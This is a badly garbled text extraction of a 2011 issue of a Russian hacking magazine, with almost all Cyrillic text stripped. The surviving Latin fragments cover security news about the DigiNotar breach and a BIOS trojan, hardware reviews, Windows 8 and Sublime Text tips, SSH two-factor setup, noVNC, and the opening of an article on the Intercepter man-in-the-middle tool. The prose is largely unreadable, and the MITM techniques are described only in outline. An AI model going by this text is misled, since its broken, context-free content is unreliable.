Вы находитесь на странице: 1из 148

SSL:

072

036

x 11 (154) 2011

Android:

WWW.XAKEP.RU

11 (154) 2011

STEVEN PAUL JOBS (1955-2011)

: 210 .

024

: MYSQL

WINDOWS 8:
,

106

HASP-
062


154

MYSQL
,

,


.
056

Intro

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

MALWARE SYN/ACK
UNIXOID PSYCHO

PHREAKING
PR-
xakep.ru

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(naumkin@glc.ru)

: , ,

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906




-


.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

, , , ,
, ,
,
.
, , , , , .
,
. ,
, . ,
98: -

.
,
.
, , ,
. SCADA-,
ERP, -- - 10%
.
nikitozz, . .
vkontakte.ru/xakep_mag
facebook.com/XakepMagazine

11/154/ 2011

(komleva@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)

(birarova@glc.ru)
( )
(tatarenkova@glc.ru)

(yakovleva.s@glc.ru)
-
(alekseeva@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2011

001

Content
MEGANEWS
004

016

020
022

MALWARE

084

FERRUM

088

Super

IPS/MVA-
: Buffalo
NAS Buffalo

Gametrix True live sense

092
098

PCZONE
023
029
030
034
035
036

Windows 8: ?
Microsoft
WWW2
web-
Sublime Text 2, -


SSH
Proof-of-Concept
VNC- HTML5
C + MITM- = 0x4553-Intercepter
MITM- Windows

102

106
110

050
056

062
067
068
072
076
078




AntiHASP
HASP
DLL-
DLL

UNIXOID
114

!
VGA- FPGA

SYN/ACK

119

046


Dropbox: 25
SAP
sh2kerr


Linux-

how to ,

PHREAKING
040


AVG, Avast, ClamAV, Panda, Comodo: ,


:
?

Easy-Hack




MySQL ,

WordPress
-
hacker tweets
-
Iframe:

BEAST: SSL-
SSL/TLS-
X-Tools

XSS: - !
XSS-

124

129

134



GlusterFS

,


138
141
144

FAQ UNITED
FAQ

8.5

Dropbox:

>> coding

MEGANEWS

WINDOWS 8 DEVELOPER PREVIEW


,
12
500 000 .

IBM

DIGINOTAR



, DigiNotar


,

PKI-
PKIoverheid.


DigiNotar. Comodo. , DigiNotar,
, ,
, , . , 531 SSL
EVSSL , 247
. .
, Yahoo!, Google,
Mozilla, Microsoft ( Windows Update), Skype,
Facebook Twitter, , ,
(cia.gov), -6 (sis.gov.uk) (mossad.gov.il). ,
DigiNotar. , , DigiNotar
, DigiNotar,
,
. ,
DigiNotar, .

350 .
Angry Birds
Rovio Mobile.

300 . .

004

SAMSUNG


bada. .

MYSQL.COM.

:


Blackhole.

IBM

,
,
. , , .
-
, .
,
, ,
, , . ,
, 45- SOICMOS 256 .
262144 , 65536
. IBM ,
,
, ,
.
.

ELCOMSOFT

BLACKBERRY,
,
. 7-

.

PARALLELS
DESKTOP 7 MAC.

90 ,

.

11 /154/ 2011

MEGANEWS

DDOS- : $50.


Intel McAfee
DeepSAFE,
Intel. ,
. 22 IvyBridge
SMEP. SMEP
, ,
. SMEP

3 ,
.
,
Intel .
( 3, 2011) ,
. ,
SMEP DeepSAFE.
,
. ,
(www.giperdriver.ru/node/3)
,
.

][,
.

.

,
. , ,
iPhone , , .

, .
,
, , , .
50 , , .
, . ,
, ,
. , , , ,
:).

$40 000 FACEBOOK



,

.
$7 000,
6 .

16
.

006

20


-

iPhone 3GS

Pwn2own.

JAILBREAKME.COM,


Comex
Apple. .

20
LINUX. 1991 21-


Linux.

11 /154/ 2011

WEXLER.HOME 903


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .


. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

. , , ,
.

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

11 /154/ 2011

07

MEGANEWS

51 , AngryBirds.

AMAZON
KINDLEFIRE !
KINDLE


Amazon. ,
, ,
, TechCrunch. ,
Android,
Amazon. , AndroidMarket
Amazon. , Amazon . ,
,
.
Amazon. Kindle Fire
:
, , .
Amazon . 7-
IPS- 1024 x 600 multi-touch. TI OMAP
(1 ) 8 .
Wi-Fi 802.11 b/g/n. 3G : , , WiFi . TechCrunch, WiFi+3G, , . ,
3G ? Kindle ,
, (- ),
KindleFire . ,

. Amazon
EC2
. , Amazon
Kindle Fire
. Amazon Silk. ,
Kindle.
$79! Amazon , www.shipito.com.

KindleFire, ,
15 , .
$199.

EKOPARTY
- Ekoparty
.

.
1000 ,
,
Ekoparty.
,
ESET, Immunity, CORE, Microsoft, Google, Intel TippingPoint.
,
,
64- Windows
, .
,
SSL BEAST.
: , 72 !

008

11 /154/ 2011

11 /154/ 2011

09

MEGANEWS

1 023 GOOGLE IBM. .

400

ADOBE FLASH

LINUX


,
GOOGLE

Adobe Flash (10.3.183.5),
13 , 12

Flash-.
? , , Google
,
- 400
(, ) .
, ,

Google. ,
. , ,
BlackHat 2011,
Sophos.
, Windows Vista
, ,
. , , Sophos
. ,
.
Adobe Flash. , Google
Flash- Chrome.
, Adobe - ,
. , Google
Adobe ,
. ,
Google, .
,
, 20.000 SWF. Flash 2000 CPU.
(),
.
, , ,
.. 400 ,
Flash-. Adobe
106 . , ,
80 .
?
Adobe :
CVE- , ,
Adobe, CVE
, (SPLC Adobe
Secure Product Lifecycle). Adobe CVE :

zero-day . , , CVE ,
, .

kernel.org 17 ! , .

.

, bittorrent.com utorrent.com. , Security Shield.
BitTorrent- .
-. kernel.org,
linuxfoundation.org linux.com.
root- , . , opensshserver openssh-clients,
. ,
linuxfoundation.org Linux.com. .
, .
Linux Foundation
.

, WORDPRESS

14.7%

WORDPRESS,
WORDPRESS.ORG
010

11 /154/ 2011

11 /154/ 2011

011

MEGANEWS

GOOGLE WALLET




,

. 13
25-
18 .
. , .

. 15
,

Facebook .
, . , Facebook
:
, .

, .
:
, , .
,
,
. : 18
5 .
,
.
,
.

Google
Google Wallet
,
,
Near Field Communication (NFC). Google Wallet

NFC- PIN-,
.
.
, Google Wallet ,
MasterCardPayPass, 150 . Google Wallet

MasterCard Citi Google PrepaidCard,

. Google Visa, American Express Discover.
:
Nexus S 4G.

NFC.



NFC
(NearFieldCommunication),


(
)
.



.

, 8
. , Royal Bank of
Scotland,
. ,


?

012

DOOM 3

23%


,
id Software
.


,

Nielsen.

11 /154/ 2011

3 . DIRT 3 AMD. AMD4u.com.

BIOS



BIOS
. 1999
CIH
BIOS
,

: BIOS
,


.

360 , , Trojan.Mebromi Symantec.


, ,
MBR - , , ,
, BIOS
.
Trojan.Bioskit.1 , :
, , . Trojan.Mebromi
, Windows 2000 (
Windows Vista), .
, . :
cbrom.exe, hook.rom, my.sys, flash.dll bios.sys. bios.sys
, BIOS Award,
MBR. bios.sys
Award BIOS, . Trojan.Mebromi -

, BIOS. , Icelord. 2007 :


Winflash Award BIOS
, BIOS
SMM (System Management Mode). SMM SMRAM
( BIOS ,
) . :
,
, , ..
BIOS cbrom.exe ( Phoenix Technologies), ,
, .
hook.rom ISA BIOS ROM.
Trojan.Mebromi
BIOS .
BIOS PCI Expansion ROM,
hook.rom. MBR . , Award BIOS
. ,
,
BIOS . ,
Trojan.Mebromi
, , ,
BIOS .

39%
iOS ANDROID


,

VIAFORENSICS
11 /154/ 2011

013

MEGANEWS

INTEL GOOGLE Android Intel.

SPYEYE ANDROID

TOR

TOR ,

F-Secure
, Man-in-the-Mobile SpyEye. ,
, ,
SMS- ,
Symbian. .
Trusteer
Spitmo, , Android-.
, Symbian:
, SpyEye,

-. SMS , ,
,
. Trusteer ,
,
, ,
.
,
, TAN-,
, Google Facebook,
.


Trusteer,
Zeus SpyEye

.
72%
1.6

,
.


,
Tor.
,

Tor, .
, : ,
, Tor,
.
? Tor ,
- https,
.

Tor, SSL-: ,
.
,
,
.

HTC.
,
webOS,
Palm
HP.


52% .
:
34%,
81%.



Facebook.
,

.

014

15%
FACEBOOK
LIKEJACKING.

Like! .

DDOS!
23% DDoS ,

.

11 /154/ 2011

SKYPE . App Directory 30 .

WEXLER

EDIFIER R1200T

Edifier

Edifier R1200T .
.
, Edifier R1200T , (140 x 240 x 183 ),

. ,
. R1200T .
,
, , .
.
R1200T
. . /- 106 , 72 ;

52 20000 . 28
RMS, 25 .
, Edifier R1200T ,
, . ,
R1200T
2.0.
2 200 .


,
. , ,
,
:). Wexler

WEXLER.BOOK Flex ONE, 6"
E-ink .
.
,
, ! ,

.
, . , .
1241397,5 , 200 .
WEXLER.BOOK Flex ONE
8 , 40
MicroSD. (TXT / PDF/ DOC / CHM
/ HTM / HTML / EPUB / FB2), (JPG / JPEG / BMP
/ GIF / PNG) (MP3).
.
. 7.990 .




.

Readius,

2010 ,
.
,

OLED
Sony.

WINSTON XSTYLE WINSTON


Winston Winston XStyle:
,
.
LSS * Winston

11 /154/ 2011

XS
. Winston XStyle LSS:
.
*
LSS .

015

FERRUM


SUPER


IPS/MVA-

:

!

. ,




!

Dell UltraSharp U2711

? .
, PC - 10-12 ,
3-5 .
,
8-10
30 (, , ). ,
1-2 . ,


140000 , 5834 16 .
,
68.84 . ,
23.24%
: .

. , ,
CAD-, ,
,
. ,
TN-
. -
IPS (SFT) MVA.

iiyama ProLite X2472HD-1

, ,

LG IPS236V

. IPS (In-Plane
Switching) SFT (Super Fine TFT)
Hitachi NEC (). ,
- ).

, ,
. ,


:
Apple LED Cinema Display
ASUS PA246Q

NEC MultiSync EA232WMi


ViewSonic VP2365wb

016

RGB 24 . IPS- .

, ,

.
, , TN IPS .
TFT TN ,
IPS .
.
H-IPS (Horizontal), E-IPS (Enhanced) P-IPS
(Professional).
,
Advanced True White, .
. ,
P-IPS 1.07
30- .


MVA (Multi-domain Vertical
Alignment), Fujitsu,
TN IPS.


, ,
RCT, .
IPS
,
.
, , ,
, IPS-.
MVA- iiyama ProLite X2472HD-1
.

11 /154/ 2011

Super

! , ,
. (
)
. IPS-
, ,

, VESA.
. TFTtest
.

Pixel Persistence Analyzer


. , IPS : -

.
,
DataColor Spyder3 Elite,
( ,
45 60
) .

RGB-.
, .
. .

.
,
sRGB.
IPS- .
P-IPS-
Adobe RGB.

APPLE LED CINEMA DISPLAY


Apple .
, -
.
! ,
Apple LED Cinema Display . ,
.
Apple, . -, ,
, . : , , -,
Mini DisplayPort Apple LED Cinema Display PC
. ,
USB-
.
.

40 000
.

ASUS PA246Q
ASUS PA246Q
24 (
27- ), .
,
. , !
, . . .
: , .
, ASUS PA246Q
( , , Mini
DisplayPort), USB 7 . , .
ASUS PA246Q P-IPS. , , 1.07
30- .

18 000
.

11 /154/ 2011

017

FERRUM

DELL ULTRASHARP U2711


Dell UltraSharp U2711 . . , , , Apple.
. .
-
- .
Dell UltraSharp U2711
, 27- . , 90
.
. USB- - 8
. ,
.
DVI, D-Sub, HDMI, DisplayPort USB.
, , ,
.

28 000
.

IIYAMA PROLITE X2472HD-1


, ,
, . iiyama
ProLite X2472HD-1 VA-. , MVA.
, . .
.
, .
. !
. -
, . - (
) .
, .
,
BX2472HD . D-Sub, DVI HDMI, iiyama ProLite X2472HD-1
.

10 000
.

Apple LED Cinema


Display

:
, :
/:
:
:
:
:
I/O:

IPS
27, 2560x1440
178/178
16.7
1000:1
12
490650201
Mini DisplayPort, 3x USB 2.0

10.7

018

ASUS PA246Q

IPS
24.1, 1920x1200
178/178
1073.7
1000:1
6
559381235
1x D-Sub, 1x DVI, 1x HDMI, 1x DisplayPort, 3x USB
2.0, -
7.3

Dell UltraSharp
U2711

IPS
27, 2560x1440
178/178
1073.7
1000:1
6
647428200
1x D-Sub, 2x DVI, 1x HDMI, 1x DisplayPort, 5x USB
2.0, -
7.7

11 /154/ 2011

Super

NEC MULTISYNC EA232WMI


NEC MultiSync EA232WMi
. , .
, .

.
. .
, , 5 USB.

. NEC MultiSync
EA232WMi - , ECO Mode . . , . ,

? , , NEC,
.

14 000
.

VIEWSONIC VP2365WB

ViewSonic. ,
. ,
: IPS-
.
VP2365wb
NEC MultiSync EA232WMi. .
, ,
, , .

. /
.
, ,
ViewSonic USB .
4 : ,
. : D-Sub
DVI , , .
.

10 000
.


iiyama ProLite
X2472HD-1

MVA
24, 1920x1080
178/178
16.7
3000:1
8
570420179
1x D-Sub, 1x DVI, 1x HDMI
3.6

11 /154/ 2011

NEC MultiSync
EA232WMi

IPS
23, 1920x1080
178/178
16.7
1000:1
14
550379220
1x mini D-Sub, 1x DVI, 1x DisplayPort,
5x USB 2.0
7.5

ViewSonic
VP2365wb

IPS
23, 1920x1080
178/178
16.7
1000:1
5
548434250
1x D-Sub, 1x DVI, 4x USB 2.0
6.8

Dell
UltraSharp U2711. 60 ( ).

.
30000 ,
IPS-, ?
ASUS
PA246Q. , ,
. z

019

FERRUM

: BUFFALO
Buffalo
.
,

. Buffalo
, , ,
.

LINKSTATION PRO
Microsoft. ,
Buffalo , ,
. ,
3 ,
. ,
, NAS
, DLNA UPnP. ,

-, USB-.

: 1 SATA-II
:
1, 2, 3
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0
:
SMB/CIFS, AFP, FTP, HTTP,
HTTPS (WebAccess), NTP
:
17 / . 24
: 45 x 156 x 175
: 1.1

LINKSTATION DUO
,

.
,
6 ,
. , Apple TimeMachine
, . WebAccess iPhone Android,
, .

020

: 2 SATA-II
: 2, 4, 6

RAID: 0, 1 Standard
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0

: SMB/CIFS, AFP,
FTP/FTPS, SFTP, HTTP, HTTPS
(WebAccess), NTP, Kerberos
:
26
: 86 x 204 x 127
: 2.3

11 /154/ 2011

: BUFFALO

LINKSTATION PRO DUO


Pro Duo
Linkstation Duo. ,
74 /,
600 /, ,
BDRip'.
6 : ,

. ,
24 .

: 2 SATA-II
: 2, 4, 6

RAID: 0, 1 Standard
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0

: SMB/CIFS, AFP,
FTP, HTTP, HTTPS (WebAccess), NTP, Kerberos
: 17
/ 24 Max
: 86 x 204 x 127
: 1.7

LINKSTATION PRO QUAD


,
3
.
, 12
, , DLNA UPnP-,
-, iTunes- -----.
, .
, , RAID- 0, 1, 5, 10
JBOD.
web-, .

: 4 SATA-II
: 4, 8, 12

RAID: 0, 1, 5, 10 JBOD
: Ethernet
10/100/1000 Mbps, 2 x USB 2.0

: AppleTalk, SMB/
CIFS, AFP, FTP, HTTP, NTP,
Kerberos
:
43
: 149 x 233 x 154
: 5.5

LINKSTATION MINI

: 2 SATA-II
: 1, 2

RAID: 0, 1, JBOD
: Ethernet
10/100/1000 Mbps, 1 x USB 2.0

: AppleTalk, SMB/
CIFS, AFP, FTP, HTTP, LDAP
:
17
: 82 x 40 x 135
: 0.5

11 /154/ 2011

NAS?,
Buffalo
- 2,5 .
- : , .
,
, ,
.
NAS , iTunes, DLNA
BitTorrent-. , ,
web-.
, ,
- .

, .

021

FERRUM

GAMETRIX TRUE LIVE SENSE

:
: /
: 6
: USB, 3.5
: ,
, USB

4500
.

022

15, 120. , , ! ,
?
? ,

.
3D- , ,
, .

.

,
Gametrix
True live sense.
:
, . , , ?
Gametrix
, ,
, , .
( ), ().
,
.
, .
, .
.

USB, .
,
.
,
(
Satisfaction).

,

.

?
- World
of Tanks ( ) WoT .
,

.

Gametrix True live sense
,
.
,
.
, ,
, .
Gametrix, ,
. , , ,
-.
.
.

.

, .
Gametrix
.
, ,
. ,
. ,
Gametrix . . . z

11 /154/ 2011

Preview

32 .
PC_ZONE .

72

SSL-
2004 .
SSL 3.0 TLS 1.0.
,
.

. BEAST
2
PayPal,
. ,
-

,
, .

PC ZONE

24

WINDOWS 8:
Microsoft

. Windows 8
.

30

SUBLIME TEXT 2, -

?
,
.

36

0X4553-INTERCEPTER
Windows
MITM, ,
SSL.

56


,
MySQL
, .

11 /154/ 2011

68

IFRAME:
,
iframe, . ?

78

XSS: -
10 XSS-, 6
, 4 .

023

PC ZONE



MICROSOFT
Microsoft, ,
,
Windows 7,
Windows 8
. ,
,
Windows 8 Developer Preview .

WWW

Windows 8:
bit.ly/mXPxyQ
,
Metro UI:
bit.ly/nNzaN8

WARNING

Windows 8:
bit.ly/mXPxyQ
,
Metro UI:
bit.ly/nNzaN8

Windows 8:
?
WINDOWS 8
, , Microsoft
Windows .
, ,
Metro UI, ,
.
, .
: Metro-
Windows
. :
, . ,
, . , ,
Windows 8 . BUILD,
Developer Preview, ,
ARM.

METRO UI

024

Metro UI ,
. , , .
,
Home Screen',
- Windows Phone.
, -. , , ,
, .
, .
(, RSS- )
( ,
Win).
, . ,
.

11 /154/ 2011

Windows 8: ?

Metro UI

, . .
Win + M. Start, Metro UI.
, , . MSDN (http://bit.
ly/r0SCC4) , 1992
Start,
Windows 3.x,

Windows .
,
. :
Windows 7 11% , Windows
Vista.
, . ,
.
Start Metro UI,
.
,
, (,

, ), ,
.
.
Metro UI .
, , Windows

BSOD

.
, Metro UI,
Start. , Desktop, ...
. :). , Metro
UI ,
Youtube'.

11 /154/ 2011

025

PC ZONE

?
, , Windows 8,
. ,
. Microsoft
Windows 8. ,
. Windows 7 SP1 404
32 , Windows 8 271
29 . Lifehacker.com
(lifehac.kr/oA2pOP)
: Core i7 3.8 6
, 2 Nvidia GeForce
9800 GT. .

Windows 8

Windows 7

0:10

0:35

(~700)

0:29

0:32

( ~700 )

0:11

0:12

Handbrake

8:06

8:15

0:46

0:46

10 Chrome

0:07

0:07

3dmark10

6470

6455

,
. 3.5 (
).
, ,
. , :).

8 ,
, ( MultiMonitor TaskBar).
dual monitor . ,
Windows 8 . Metro Microsoft
. BSOD.
Blue screen of death. , , , ,
:).
, HAL_
INITIALIZATION_FAILED.

WINDOWS EXPLORER
,
Windows Explorer.
Ribbon-, Office 2007/2011.
.
, ,
Manage
. , , ISO-
(, UltraISO). File.

, .
/ . , ,
. , ,
. ,
.
, .
, .

026

, Windows 8 -.
, .
,
, ,
.
End
Task. Metro-,
suspended ( ,

11 /154/ 2011

Windows 8: ?

WINDOWS 8

,
:
1. .
, ,
... .

,
.
2. Dual-boot.
Windows 8 , ,
, . (
).
.
, .
Windows 7
. VHD (Virtual Hard Drive
Files). ,
.vhd-. ,


,
. .
1. ,
. , 60 .
, BSOD.
2.
Windows 8 Developer Preview.

. ,

Microsoft Windows 7 USB/DVD download
tool (bit.ly/nYylp9).
3.
, .
diskpart:

. :

, .

.

, ,
,
,
VHD-. .
, :).

4. ,
. Custom,
.
.
.
.
!
(Shift + F10),
diskpart
VHD-:

,
DVD. :
1. VHD-;
2. .
3. ,
( F8)
. VHD .
diskpart:

DISKPART> select vdisk file="d:\Virtual Machines\Win8.vhd"


DISKPART> attach vdisk

DISKPART> select vdisk file=d:\VMs\


Win8.vhd
DISKPART> attach vdisk

C:\Windows\system32>diskpart
Microsoft DiskPart 6.1.7601
: THISISSTATION
DISKPART>
create vdisk file="d:\Virtual Machines\Win8.vhd" type=expandable
maximum=60000
( ): 100

DiskPart.

11 /154/ 2011

<ALT-TAB>

. , .
,
.
!
.
5.

w ! ,

- (,
notepad) ,
(, d: f:).
4. : f:\setup.
f: VHD.
5. , Custom. , ,
.
,
VHD? :)

027

PC ZONE


! :) Windows 8
: ,
HTML5 + Javascript.
WinRT
Win32. API
, Win32 API.
Win32,
. :
Metro;
UI (
Win32);
API ;
API SandBox' (
WinRT , ,
, ).

,
. , ,
,
, . .

LOCK SCREEN
lock- .

. : ,
. ,
. ,
PIN, , ,
.
, ? :)
Windows Live ID, . , Sync
PC Settings. , Windows 8, Windows
Live ID. ,
Windows
Live. , ,
, .
, ,
SkyDrive.

). -.
More details, , ,
-, . ,
Processes :
. , ,

. ,
, :).
, ... (, !).
Performance
Metro UI, . App
History: . (, ). ,
,
( -
). Startup

028

,
,
, . , Windows 8 , .
, -.
, :
Metro UI . ,
Microsoft . Windows App Store
Developer Preview. , , ,
, .
, .
,
(-, ).
Refresh Your PC
.
?, ,
refresh- ,
. z

11 /154/ 2011

WWW2
CODECADEMY
www.codecademy.com

, - , ,
. ,
- .
Codecademy ( ) ,
( JavaScript).
.
, : .
, .
- Foursquare.

SHOWMEDO
showmedo.com

(!) , .
,
. ( peepcode.com destroyallsoftware.com),
,
- .
, . ,
. ShowMeDo , , 100% . Python:
600 .

SECURITYTUBE
www.securitytube.net

,
SecurityTube. , , . , ,
, Metasploit. .
,
, , , X-Toolz PoC'.
, , . ,
, VisualHack++ :).
-

ASCIIFLOW
www.asciiflow.com

. , -,
, , Visio. Ascii-. Ascii art.
, , -.
. , . Ascii-? :). Ditaa!,
.
-

11 /154/ 2011

029

PC ZONE

Step (twitter.com/stepah)

Sublime Text 2,
-




, Windows Notepad++, Linux gedit,
Mac
TextMate.
: Sublime Text 2.
,
-
.

Sublime Text 2. Mac

WWW


Sublime Text:
www.sublimetext.
com/forum
:
wbond.net/sublime_
packages

Sublime Text 2 ,
. TextMate,

Mac, . : Duke
Nukem Forever ,
TextMate. Sublime Text, ,
. : , , , . ,
- ,
, ,
. ,
Mac, .
-.

-
, Sublime Text , Windows, OS X Linux . , ,
(
?). -
, .
, Sublime Python'!
Ctrl-` (),
Python-. Python
: API,
. Python
. , , . , Sublime :
, , $59
?. .


Sublime , .
. ,
,
. . (-), -

030

11 /154/ 2011

Sublime Text 2, -

.
Chrome.
, Notepad++.

, ,
.
, TextMate.
- ,
.
, ,
. ,
HTML-
JavaScript, .
: C, C++, C#,
CSS, D, Erlang, HTML, Groovy, Haskell, HTML, Java, JavaScript, LaTeX,
Lisp, Lua, Markdown, Matlab, OCaml, Perl, PHP, Python, R, Ruby, SQL, TCL,
Textile XML.
.

-
Sublime,
-. , - , ,
, 10 000 .
,
. ,
. , . Sublime
. - : ?

: pastebin.com/raw.php?i=7356r0ZM :). -, ,
, , , -
. , ?


, ,
: , Distration Free Mode (Shift + F11).
.
Sublime Text .
, ,
, - .
, (View Layout) .

.

Soda


Textmate, Sublime Text . , Tools
Ctrl + Shift + P ( Mac: Shift + Command + P). ,
, ,
(, ),
Command Palette. ,
(,
Try/Except) Sublime . 5 33 ,
. , , :
py- , Python.

GO ANYTHING
, , Go Anything. :
. Ctrl
+ P (Mac: Command + P). .
, . ,
, .
, , 50
000 ! 10 ?
":10". "#"
. Sublime
.
(, , ).
"@". ,
(,
Ctrl + R).
.
, . , tp@rf, read_file text_parser.py, tp:100
100- !
, Sublime Text ,
.

11 /154/ 2011

. , 10 , 10 .
. ,
,
.
Alt ( Command Mac')

031

PC ZONE
, . Shift + Ctrl/Command + L
. , ( ,
..)
Control/Command + D.
. .
Alt + F3 Ctrl+Command+G .


.
. ,
, . .
Edit,
. ,
. C++
Alt-O (File-Swap Header/
Implementation). , . , : D, Erlang, Haskell, JavaC, Make, Python, Ruby.



(, , Python').
,
.
, ,
Sublime Text.
Sublime',
. (, ),
.
Sublime Package Control, (, Python-)
:
import urllib2,os;pf='Package Control.sublime-package';
ipp=sublime.installed_packages_path();os.makedirs(ipp)
if not os.path.exists(ipp) else None;
open(os.path.join(ipp,pf),'wb').write(urllib2.urlopen(
'http://sublime.wbond.net/'+pf.replace(' ','%20')).read())

Preferences Package control.

SUBLIME TEXT

SublimeCodeIntel
bit.ly/p5LzZE

,
Sublime ,
. , Code
Intelligence Komodo
Editor.
,
,
.

032

sublime-text-2-git
bit.ly/rfna5O

Sublime
.
, .

Git.
SVN,
Mercurial.

Clipboard history
bit.ly/rqtKEu

,
Sublime Text
( Ditto),
.

,
Sublime Text
(Ctrl + C).

Mote
bit.ly/mPIeAO

sftp/
ssh2,
. ,
PuTTY
,
.

11 /154/ 2011

Sublime Text 2, -


Sublime Text
,
Windows 1252. ,
,
(File Reopen with encoding Windows 1251), .
Sublime
Windows 1252, Windows 1251.

(Preferences File settings Default).
:

"fallback_encoding": "Western (Windows


1252)",
, , :
"fallback_encoding": "Cyrillic (Windows
1251)",

Vi',
Vintage Mode.
vi
Sublime Text', . ,
. ,
Preferences Global Settings Default
menu item Vinate
( ),
:

"ignored_packages": ["Vintage"]
//
"ignored_packages": []
//
Sublime. ESC.
-
INSERT MODE, , :).

, Sublime Text .
,
, , -
,
Soda ( ).
1. .zip- GitHub- (bit.ly/nIMqT7)
2. Theme
Soda Packages
Sublime Text.
3. , (Preferences User Global Settings).
: (Soda Light.
sublime-theme) (Soda Dark.
sublime-theme),
:

{
"theme": "Soda Light.sublime-theme"
}

Python .

Install packet, , .
.

ZEN CODING
, ,
Zen Coding.
HTML CSS , .

, . .
div#page>div.logo+ul#navigation>li*3>a
,
(ctrl+space, ) :
<div id="page">
<div class="logo"></div>
<ul id="navigation">
<li><a href=""></a></li>
<li><a href=""></a></li>
<li><a href=""></a></li>
</ul>
</div>
(bit.ly/pEAGgU), . : bit.ly/pipb3U. ,
, , .

11 /154/ 2011

, . ,
.
, ... .
, Goto Anything. . -
? ( ). ,
, . ? :).
,
( ). , ( ) , , .
Sublime Text
. . - ,
153- , .
: , - ? ,
. .

Sublime Text.
,
-. . .
,
(, , TextMate).
, ,
.
. TextMate' ,
. , Sublime ,

.
, ,
Go To Anything, zencoding. . z

033

PC ZONE

SSH
Gmail.
: Hdfk^j2. ,
, .
,
Google-. GMail .
,
SSH-.
, . ,

.
Google Authenticator (
iPhone, Android, BlackBerry) , -
Google. ,
. ,
, -
(, ,
:).
, Google .
,
OATH (Initiative for Open Authentication),
( Symantec VeriSign).
: , Google , .
(PAM) ,
, OpenSSH.

1. PAM- Google Code :


hg clone https://google-authenticator.googlecode.com/
hg/ google-authenticator/

PAM-

034

QR-

2. :
cd google-authenticator/libpam/
$ sudo make
,
Makefile ( : bit.ly/q7aysJ).
3. pam_google_authenticator.so /lib/security/,
google-authenticator /usr/bin.
4. /etc/pam.d/sshd, SSH- PAM-:
auth required pam_google_authenticator.so
/etc/ssh/sshd_config:
ChallengeResponseAuthentication yes
5. , . , :
$ google-authenticator
https://www.google.com/chart?chs=200x200&..FBPWIL6PRYLVBQ
Your new secret key is: YOFBPWIL6PRYLVBQ
6. . QR, Google
Authenticator, , ,
. , - Google ( , ).
7. SSHD, , ,
! z

11 /154/ 2011

Proof-of-Concept
VNC- HTML5

,
,
: ?
,
- Java Flash.
noVNC . VNC-,
HTML5 (WebSockets + Canvas).

WebSockets, websocket-js WebSockets, Adobe Flash.


Javascript Engine.
JS-,
RFB.
Chrome
Firefox, Native
WebSockets.

VNC (Virtual Network Computing)



.

RFB (remote framebuffer). Intel
Intel KVM,

. VNC- ,
. , .
noVNC (kanaka.github.com/noVNC)

noVNC ,
,
, .
, . , -,
Display (include/display.js),
HTML5 canvas, -, RFB (include/rfb.js),

RFB, , -, Websock (include/
network.js),
Native WebSockets
Flash Websocket
.


HTML5. ,

, , .

noVNC HTML5,
.
:
HTML5 Canvas ( createImageData).
HTML5 WebSockets. ,

?
, VNC-
WebSockets
( x11vnc/libvncserver),
-
WebSockets2TCP. ,
, Python,
( websockify) , ,
SSL/TLS- (
"wss://").
, mini-webserver,
,
WebSockets-.
VNC-:
./utils/launch.sh --vnc localhost:5901

noVNC , HTML5

11 /154/ 2011

URL,
. Connect
.

VNC-. z

035

PC ZONE

, 0x4553-Intercepter
,
2008 .

MITM-.
,
SSL.

Ares (intercepter.nerf.ru)

MITM-
WINDOWS

C + MITM- =

0x4553-Intercepter
036

11 /154/ 2011

C + MITM- = 0x4553-Intercepter

0x4553-Intercepter

INTERCEPTER?

Windows . . .
unix' iptables,

, , , . , NAT ( ip forwarder)
- .
Windows , ,
proof of concept . , , unix
- Intercepter. ettercap unix
: arp-, , sslstrip .
- . , unix,
,
GUI-, . Intercepter
. ,
SSL MITM SSL Strip ,
,
MITM': ARP, ICMP, DNS over
ICMP, DHCP.
IP- MAC-, , .
(PDF-
),
, 0x4553-Intercepter.


Intercepter .
- MITM-

11 /154/ 2011

. 0.8 Intercepter
0x4553-NAT. NAT, ,
.
ethernet PPPoE- ADSL-
FTP-.
DHCP DHCP MITM. , , , .
1. ICMP Redirect MITM.
, .
2. DNS over ICMP MITM. ,
ICMP Redirect. DNS, ,
DNS.
3. SSL MITM. , ,
SSL ( SSLv2, SSLv3, TLSv1).
4. SSL Strip. Windows.
sslstrip unix.
,
DHCP MITM, .

DHCP MITM
.
DHCP-.
. ,
DHCP Discovery, IP-
, .
DHCP Offer,

037

PC ZONE
.
NAT . , ettercap,
0x4553-Intercepter.
:
1.
IP-.
DHCP-.
2. DHCP-.
3. , .
.
1. , , .
0x4553-NAT,
.
2. , DHCP-
Intercepter WinPcap .
DHCP- Windows Server 2003, tftpd32 DHCP-, ADSL-. , DHCP Intercepter
,
.
3. , DHCP- - . .
.
, - ,
IP-. gratuitous arp.
, DHCP Discovery
.
, , IP . ,
